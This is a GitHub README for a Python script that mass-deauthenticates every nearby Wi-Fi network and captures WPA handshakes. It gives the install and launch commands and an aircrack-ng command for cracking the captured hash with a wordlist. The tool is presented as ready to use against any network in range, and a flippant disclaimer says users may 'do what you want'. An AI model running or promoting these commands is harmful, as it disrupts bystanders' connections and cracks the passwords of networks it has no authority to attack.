Skip to content

Latest commit

 

History

History
44 lines (32 loc) · 793 Bytes

README.md

File metadata and controls

44 lines (32 loc) · 793 Bytes

Mass deauth


This script deauth everyone on every wifi around you & grab password hash !

USAGE

First install the requirements :

pip3 install -r requirements.txt

Now you can launch the script !

python3 heheheha.py {YOUR_WIFI_INTERFACE} {YOUR_MONITOR_WIFI_INTERFACE}

or

python3 heheheha.py

[use wlan0 on both interface]

exemple:

python3 heheheha.py wlan0 wlan0

The file who contain the Handshake is on the current directory, for crack the key make a aircrack command with your fav wordlist :
aircrack-ng the_output_name.cap -w /home/root/wordlist/your_wordlist.txt



Just for educational purpose only, Do, what you want I don’t give a fuck, but it’s not my fault you’re in trouble.